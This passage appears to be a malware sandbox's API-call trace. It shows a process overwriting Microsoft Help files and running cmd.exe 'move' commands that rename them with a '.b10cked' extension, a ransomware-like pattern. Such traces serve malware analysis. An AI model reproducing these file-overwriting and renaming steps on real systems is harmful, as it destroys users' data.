lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.878] CloseHandle (hObject=0x120) returned 1 [0199.879] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN") returned 0x27 [0199.880] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") 
returned 0x1b [0199.880] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x89c, dwThreadId=0xde0)) returned 1 [0199.991] CloseHandle (hObject=0x1b4) returned 1 [0199.991] CloseHandle (hObject=0x120) returned 1 [0199.992] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.992] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.992] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.992] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.992] ReleaseMutex (hMutex=0xf8) returned 1 [0199.992] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.992] ReleaseMutex (hMutex=0xf8) returned 1 [0199.992] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.992] ReleaseMutex 
(hMutex=0xf8) returned 1 [0199.992] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.992] ReleaseMutex (hMutex=0xf8) returned 1 [0199.992] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.992] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.992] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25678183749) returned 1 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.993] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16a [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.993] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16a [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.994] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.995] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.995] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16a [0199.995] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.995] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.995] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0199.996] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.996] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0199.996] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0199.996] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: 
lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0199.997] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0199.997] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0200.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0200.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x132f75c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINWORD.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0200.001] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16a [0200.002] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0200.002] CloseHandle (hObject=0x120) returned 1 [0200.003] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN") returned 0x27 [0200.003] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0200.004] CreateProcessW (in: lpApplicationName=0x0, 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe6c, dwThreadId=0xf20)) returned 1 [0200.029] CloseHandle (hObject=0x1b4) returned 1 [0200.029] CloseHandle (hObject=0x120) returned 1 [0200.029] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0200.029] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0200.029] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0200.029] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.029] ReleaseMutex (hMutex=0xf8) returned 1 [0200.029] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.029] ReleaseMutex (hMutex=0xf8) returned 1 [0200.029] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.029] ReleaseMutex (hMutex=0xf8) returned 1 [0200.029] WaitForSingleObject 
(hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.029] ReleaseMutex (hMutex=0xf8) returned 1 [0200.029] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0200.030] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.030] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.030] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.030] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25681962216) returned 1 [0200.030] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x21d0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.031] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.032] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x21d0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.033] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1ce8 [0200.033] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, 
lpOverlapped=0x0) returned 1 [0200.038] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x21d0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x21d0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0200.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0200.039] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x10e7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x10e7, lpOverlapped=0x0) returned 1 [0200.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0200.040] WriteFile (in: hFile=0x120, 
lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x10e7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x10e7, lpOverlapped=0x0) returned 1 [0200.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=-4327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x10e9 [0200.040] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x10e7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x10e7, lpOverlapped=0x0) returned 1 [0200.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=-4327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x10e9 [0200.040] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x10e7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x10e7, lpOverlapped=0x0) returned 1 [0200.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nslist.hxl", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 